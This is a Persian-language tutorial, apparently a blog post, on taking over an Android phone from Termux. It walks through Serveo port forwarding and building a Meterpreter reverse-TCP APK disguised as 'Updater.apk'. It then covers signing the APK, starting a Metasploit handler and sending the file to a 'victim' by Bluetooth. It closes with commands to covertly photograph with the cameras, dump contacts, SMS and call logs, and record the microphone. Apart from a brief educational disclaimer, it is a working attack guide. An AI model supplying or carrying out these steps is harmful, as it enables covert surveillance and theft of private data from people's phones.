تست نفوذ اندروید با برنامه ترموکس Termux
تست نفوذ اندروید با برنامه ترموکس Termux
سلب مسئولیت: این موضوع فقط برای اهداف آموزشی است. ما مسئول هر گونه استفاده منفی و غیرقانونی از این مطلب نخواهم بود. سعی کنید ازمایش های خود را در محیط ازمایشگاهی انجام دهید.
لازمه های این تست نفوذ
۱) یک گوشی اندرویدی
۲) نرم افزار Android TermuX (دانلود از فروشگاه Play)
۳) فریم ورک Metasploit نصب شده در TermuX (آموزش در اینجا)
۴) اینترنت فعال / اتصال WiFi
۵) TermuX باید اجازه استفاده از Storage External را داشته باشد (برای این منظور فقط یکبار این فرمان را وارد کنید: “termux-setup-storage”)
۶) MiXplorer (برای امضای فایل APK، آن را از وب سایت UpToDown دانلود کنید)
۷) Apk Signer) MiX Signer برای MiXplorer، دانلود آن از فروشگاه Play)
۸) از صفحه کلید هکر در خط فرمان TermuX استفاده کنید.
Port Forwarding
بسیاری از مردم برای پورت فورواردینگ از NGROK استفاده می کنند. اما در NGROK، می توانید ببینید که در هنگام اتصال مجدد به آن دامنه یا پورت جدید ایجاد می شود. دامنه و پورت اختصاصی هم فقط برای کاربران ویژه است. به همین دلیل، برای NGROK شما هر بار که شروع به هک می کنید، باید یک فایل APK جدید ایجاد کنید.
در این اموزش ما از Serveo استفاده می کنیم. در Serveo، شما می توانید به طور دستی پورت مورد نظر خود را در اینترنت ارسال کنید. برای استفاده از پورت فورواردینگ Serveo، شما باید بسته OpenSSH را بر روی TermuX نصب کنید. برای این کار، دستور زیر را در TermuX وارد کنید:
pkg install openssh
پس از نصب، این دستور را تایپ کنید:
ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
در اینجا شما باید برخی از نکات را در نظر داشته باشید؛ اگر شما می خواهید یک پورت HTTP را فوروارد کنید، سپس پورت های مختلف را در هر دو قسمت “Desired_Port” انتخاب کنید. اما در اینجا می خواهیم یک پورت TCP را پیش ببریم. برای فوروارد پورت TCP، شما باید در پورت Desired_Ports همان پورت های مورد نظر را وارد کنید. همچنین “localhost” را تغییر ندهید. در اینجا ما قصد داریم یک پورت TCP را(برای مثال ۴۵۶۴) Forward کنیم. پس از پورت فوروارد، ممکن است به صورت زیر باشد:
ساخت فایل apk به همراه پیلود جاسازی شده
برای ایجاد فایل APK با Embedload Payload، این دستور را در ترموکس وارد میکنیم:
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/Updater.apk
بعد از چند ثانیه منتظر ماندن:
همانطور که مشاهده میکنید فایل APK با پیلود جاسازی شده با موفقیت برای ما ساخته شد. Phone/SD-Card Storage -> downloads -> Updater.apk
همچنین شما می توانید با استفاده از برنامه APK Editor Pro نام (Default: MainActivity) و نسخه فایل APK تولید شده را تغییر دهید.
امضای فایل جدید APK ایجاد شده
ابتدا مدیر فایل MiXplorer را باز کنید و به فایل (APK Un-Signed (Updater.apk بروید.(در پوشه ی آپلود قرار می گیرد).
انگشت خود را بر روی (APK Un-Signed (Updater.apk فشار دهید و دکمه MENU را در گوشه بالا سمت راست MiXplorer انتخاب کنید، سپس “SIGN” را انتخاب کنید.
این گزینه برای ما امضای فایل APK را نمایش میدهد. “AUTO” را انتخاب کنید تا فایل APK را به صورت خودکار و با موفقیت امضا کنید.
در حال حاضر، فایل APK شما با نام filename)-signed.apk) با موفقیت امضا شده است و حجم ان نیز ۹٫۹KB میباشد.
راه اندازی Metasploit در TermuX
با وارد کردن دستور زیر در پنجره جدید ترموکس، چارچوب Metasploit را در TermuX فعال کنید:
msfconsole
نکته(۱): اگر Metasploit-Framework را در برنامه TermuX خود نصب نکرده اید، میتوانید از طریق این لینک اقدام به نصب کنید.
نکته(۲): اگر این خطا را دریافت کردید: “Failed to connect to the database”، همانطور که در تصویر زیر نشان داده شد، دستورات زیر را در NEW SESSION وارد کنید.
mkdir -p $PREFIX/var/lib/postgresql initdb $PREFIX/var/lib/postgresql pg_ctl -D $PREFIX/var/lib/postgresql start
بعد از اینکه ابزار msfconsole شروع به کار می کند، دستورات زیر را با دقت وارد کنید:
msf> use exploit/multi/handler msf> set payload android/meterpreter/reverse_tcp msf> set LHOST localhost msf> set LPORT 4564 msf> exploit -j -z
نصب APK در گوشی Android تارگت
باید فایل Payload-Signed.apk را به دستگاه اندروید قربانی خود (به عنوان مثال از طریق بلوتوث) ارسال کنید -> آن را نصب کنید -> سپس آن را باز کنید (اطمینان حاصل کنید که دستگاه قربانی دارای اتصال به اینترنت فعال است).
پس از باز کردن فایل APK در تلفن قربانی، خواهید دید که جلسه Meterpreter در قسمت Metasploit شما فعال خواهد شد. برای باز کردن جلسه Meterpreter از دستگاه قربانی خود، روی دکمه “بازگشت” کلیک کنید و این فرمان را در جلسه Metasploit وارد کنید:
(sessions -i (Session ID
در (شناسه جلسه)، شماره جلسه Meterpreter را انتخاب کنید (به عنوان مثال هنگامی که قربانی شما فایل APK را باز می کند، این پیام را میبینید: Meterpreter Session Opened 1، در اینجا، ۱، شناسه جلسه Meterpreter است).
تبریک……!!!!!!!! شما با موفقیت از Android دستگاه قربانی خود دسترسی گرفتید.
در محیط متااسپلویت نیاز به راهنمایی دارید:
می توانید فرمان {meterpreter> help} را برای مشاهده تمام دستورات در دسترس وارد کنید.
از جمله دستورات مهم:
گرفتن تصویر از دوربین ها webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg دریافت همه مخاطبین dump_contacts -o storage/downloads/X-Contacts.txt دریافت همه پیام ها dump_sms -o storage/downloads/X-SMS.txt دریافت تماس های ورودی dump_calllog -o storage/downloads/X-CallLog.txt جاسوسی از طریق میکروفون record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3
دیدگاهتان را بنویسید
برای نوشتن دیدگاه باید وارد بشوید.